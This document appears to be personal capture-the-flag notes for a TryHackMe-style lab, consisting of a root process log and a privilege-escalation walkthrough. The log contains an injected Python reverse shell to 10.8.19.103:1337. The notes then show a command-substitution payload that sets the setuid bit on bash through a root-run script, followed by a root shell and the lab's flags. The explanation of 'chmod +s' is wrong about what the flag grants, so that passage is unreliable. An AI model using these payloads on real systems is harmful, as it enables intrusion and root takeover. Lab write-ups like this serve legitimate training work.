2023/01/13 18:50:01 CMD: UID=0 PID=18363 |
2023/01/13 18:50:01 CMD: UID=0 PID=18364 |
2023/01/13 18:50:01 CMD: UID=0 PID=18366 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18367 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18368 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18369 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18370 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18371 |
2023/01/13 18:50:01 CMD: UID=0 PID=18372 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18373 |
2023/01/13 18:50:01 CMD: UID=0 PID=18375 |
2023/01/13 18:50:01 CMD: UID=0 PID=18377 |
2023/01/13 18:50:01 CMD: UID=0 PID=18379 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18380 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18381 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18382 |
2023/01/13 18:50:01 CMD: UID=0 PID=18383 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18384 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18385 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18388 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18391 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18392 |
2023/01/13 18:50:01 CMD: UID=0 PID=18393 |
2023/01/13 18:50:01 CMD: UID=0 PID=18394 |
2023/01/13 18:50:01 CMD: UID=0 PID=18396 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18397 |
2023/01/13 18:50:01 CMD: UID=0 PID=18399 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18400 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18401 |
2023/01/13 18:50:01 CMD: UID=0 PID=18402 |
2023/01/13 18:50:01 CMD: UID=0 PID=18403 |
2023/01/13 18:50:01 CMD: UID=0 PID=18405 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18406 | /usr/bin/sh -c echo Punched in at 17:24
2023/01/13 18:50:01 CMD: UID=0 PID=18407 |
2023/01/13 18:50:01 CMD: UID=0 PID=18408 |
2023/01/13 18:50:01 CMD: UID=0 PID=18409 | /usr/bin/sh -c echo Punched in at 17:27
2023/01/13 18:50:01 CMD: UID=0 PID=18411 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18412 |
2023/01/13 18:50:01 CMD: UID=0 PID=18413 |
2023/01/13 18:50:01 CMD: UID=0 PID=18415 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18416 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18417 |
2023/01/13 18:50:01 CMD: UID=0 PID=18418 |
2023/01/13 18:50:01 CMD: UID=0 PID=18419 |
2023/01/13 18:50:01 CMD: UID=0 PID=18421 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18422 |
2023/01/13 18:50:01 CMD: UID=0 PID=18424 |
2023/01/13 18:50:01 CMD: UID=0 PID=18428 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18429 |
2023/01/13 18:50:01 CMD: UID=0 PID=18430 |
2023/01/13 18:50:01 CMD: UID=0 PID=18432 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18433 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18434 |
2023/01/13 18:50:01 CMD: UID=0 PID=18435 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18436 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18437 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18439 |
2023/01/13 18:50:01 CMD: UID=0 PID=18441 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18442 |
2023/01/13 18:50:01 CMD: UID=0 PID=18443 |
2023/01/13 18:50:01 CMD: UID=0 PID=18444 |
2023/01/13 18:50:01 CMD: UID=0 PID=18445 |
2023/01/13 18:50:01 CMD: UID=0 PID=18446 |
2023/01/13 18:50:01 CMD: UID=0 PID=18447 |
2023/01/13 18:50:01 CMD: UID=0 PID=18449 |
2023/01/13 18:50:01 CMD: UID=0 PID=18450 |
2023/01/13 18:50:01 CMD: UID=0 PID=18451 |
2023/01/13 18:50:01 CMD: UID=0 PID=18453 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18454 |
2023/01/13 18:50:01 CMD: UID=0 PID=18456 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18458 |
2023/01/13 18:50:01 CMD: UID=0 PID=18459 |
2023/01/13 18:50:01 CMD: UID=0 PID=18461 |
2023/01/13 18:50:01 CMD: UID=0 PID=18465 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18466 | /usr/bin/sh -c echo Punched in at 18:24
2023/01/13 18:50:01 CMD: UID=0 PID=18467 |
2023/01/13 18:50:01 CMD: UID=0 PID=18469 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18470 |
2023/01/13 18:50:01 CMD: UID=0 PID=18471 |
2023/01/13 18:50:01 CMD: UID=0 PID=18473 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18474 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18475 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18477 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18478 |
2023/01/13 18:50:01 CMD: UID=0 PID=18479 |
2023/01/13 18:50:01 CMD: UID=0 PID=18481 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18482 | /usr/bin/sh -c echo Punched in at 18:37
2023/01/13 18:50:01 CMD: UID=0 PID=18483 |
2023/01/13 18:50:01 CMD: UID=0 PID=18484 |
2023/01/13 18:50:01 CMD: UID=0 PID=18485 | /usr/bin/sh -c echo Punched in at 18:40
2023/01/13 18:50:01 CMD: UID=0 PID=18487 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18488 | /usr/bin/sh -c echo Punched in at 18:42
2023/01/13 18:50:01 CMD: UID=0 PID=18489 |
2023/01/13 18:50:01 CMD: UID=0 PID=18490 |
2023/01/13 18:50:01 CMD: UID=0 PID=18492 | /usr/bin/sh -c echo `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
2023/01/13 18:50:01 CMD: UID=0 PID=18491 | /usr/bin/sh -c echo `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
2023/01/13 18:50:02 CMD: UID=0 PID=18493 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:02 CMD: UID=0 PID=18496 |
2023/01/13 18:50:02 CMD: UID=0 PID=18498 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:02 CMD: UID=0 PID=18499 |
$(chmod u+s /usr/bin/bash)
or
`chmod +s /usr/bin/bash`
The command `chmod u+s /usr/bin/bash` and `chmod +s /usr/bin/bash` are very similar in their effect, both are used to make the file /usr/bin/bash a set-user-ID program, meaning that when the file is executed, it runs with the effective user ID of the file's owner, rather than the user who is executing the file.
The main difference is the letter 'u' in the first command, this specify that only the owner (user) will be granted with the set-user-ID permission, while in the second command the '+' symbol means that all users (owner, group, and others) will be granted with the set-user-ID permission.
adrian@brute:~$ echo '`chmod +s /usr/bin/bash`' > punch_in
adrian@brute:~$ /usr/bin/bash -p
bash-5.0# whoami
root
adrian@brute:~$ echo '$(chmod u+s /usr/bin/bash)' > punch_in
adrian@brute:~$ /usr/bin/bash -p
bash-5.0# whoami
root
![[Pasted image 20230113112319.png]]
![[Pasted image 20230113122130.png]]
What is the user flag?
THM{PoI$0n_tH@t_L0g}
What is the root flag?
THM{C0mm@nD_Inj3cT1on_4_D@_BruT3}
[[Content Security Policy]]